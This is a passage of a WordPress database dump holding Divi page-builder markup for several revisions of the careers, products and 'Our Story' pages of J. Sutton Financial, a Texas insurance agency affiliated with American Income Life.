sticky_enabled=\"0\" logo_width_tablet=\"75%\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 21:29:25','2023-04-08 21:29:25','',528,'http://cmdev-site1.com/?p=876',0,'revision','',0),(878,1,'2023-04-08 21:35:03','2023-04-08 21:35:03','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||17px|||\" template_type=\"section\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h2>Careers</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Page - title','','publish','closed','closed','','page-title','','','2023-04-08 21:35:03','2023-04-08 21:35:03','',0,'http://cmdev-site1.com/et_pb_layout/page-title/',0,'et_pb_layout','',0),(904,3,'2023-04-11 21:28:16','2023-04-11 21:28:16','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Careers</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto|||false|false\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" width_tablet=\"\" width_phone=\"\" width_last_edited=\"on|phone\" module_alignment=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" module_alignment=\"center\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life are truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-11 21:28:16','2023-04-11 21:28:16','',38,'http://cmdev-site1.com/?p=904',0,'revision','',0),(884,1,'2023-04-08 21:44:12','2023-04-08 21:44:12','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Careers</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto|||false|false\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" width_tablet=\"\" width_phone=\"\" width_last_edited=\"on|phone\" module_alignment=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" module_alignment=\"center\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-08 21:44:12','2023-04-08 21:44:12','',38,'http://cmdev-site1.com/?p=884',0,'revision','',0),(879,1,'2023-04-08 21:35:14','2023-04-08 21:35:14','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||17px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h2>Careers</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto|||false|false\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" width_tablet=\"50%\" width_phone=\"50%\" width_last_edited=\"on|desktop\" module_alignment=\"right\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" width_tablet=\"\" width_phone=\"\" width_last_edited=\"on|phone\" module_alignment=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" module_alignment=\"center\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\" module_alignment_last_edited=\"on|desktop\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-08 21:35:14','2023-04-08 21:35:14','',38,'http://cmdev-site1.com/?p=879',0,'revision','',0),(880,1,'2023-04-08 21:36:29','2023-04-08 21:36:29','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<h2>Products &amp; Services</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" header_text_color=\"#003372\" header_2_text_color=\"#003372\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Our Promise To You</h2>\n<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" parallax=\"on\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" url=\"https://www.ailife.com/products\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" custom_padding=\"|0px||||\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/products\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Life Insurance Policies</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" url=\"https://www.ailife.com/manage-my-policy\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"||||false|false\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\" global_colors_info=\"{}\"][/et_pb_image][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#2b2b2b\" header_3_font=\"||||||||\" header_3_text_align=\"center\" text_orientation=\"center\" custom_padding=\"8px||||false|false\" link_option_url=\"https://www.ailife.com/manage-my-policy\" border_radii=\"on|14px|14px|14px|14px\" border_color_all=\"#003372\" global_colors_info=\"{}\"]<h3>Policyholder Services</h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjgxOSJ9fQ==@\" url_new_window=\"on\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_url\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#003372\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" custom_margin=\"-46px|||||\" box_shadow_style_button=\"preset2\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-08 21:36:29','2023-04-08 21:36:29','',26,'http://cmdev-site1.com/?p=880',0,'revision','',0),(887,1,'2023-04-08 21:51:09','2023-04-08 21:51:09','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" global_colors_info=\"{}\"]<h2>Our Story</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" title_text=\"justinsuttonheadshotsmall Black-White\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Justin Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Owner/Founder</span></em></p>\n<p><span style=\"font-weight: 400;\">Justin has worked in the financial services industry for over 8 years. In 2016 the Giddens Nation was formed, where Justin worked alongside brothers Ryan and Stephen, running a satellite office in Waco, TX, and eventually becoming the Senior Regional Director of the Giddens-Giddens Agency. In 2022 Justin formed J. Sutton Financial to extend the reach of the Giddens-Giddens agency into the 100% remote hemisphere of the Financial Services Industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" title_text=\"Seth\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Seth Ordeneaux</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Since starting with the company in April 2020, Seth has had the opportunity to learn from and develop some of the top leaders in our company. His ability to build relationships with his clients and colleagues has led him to become one of the Top managers in our industry, with several notable accomplishments from top representative to top manager in a very short amount of time.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" title_text=\"Matthew Sutton\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" custom_padding=\"||52px|||\" global_colors_info=\"{}\"]<h3><b>Matthew Sutton</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Matthew\'s career has been nothing short of incredible. With just 5 years in the financial services industry, Matthew has accomplished achievement after achievement. In recent years he has won two separate contests (March Madness/Battle of the Nation), and if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" title_text=\"Andres Cano\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"3_5\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Andres Cano</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-08 21:51:09','2023-04-08 21:51:09','',702,'http://cmdev-site1.com/?p=887',0,'revision','',0),(882,1,'2023-04-08 21:38:39','2023-04-08 21:38:39','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"||17px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_color=\"#FFFFFF\" header_2_font_size=\"50px\" 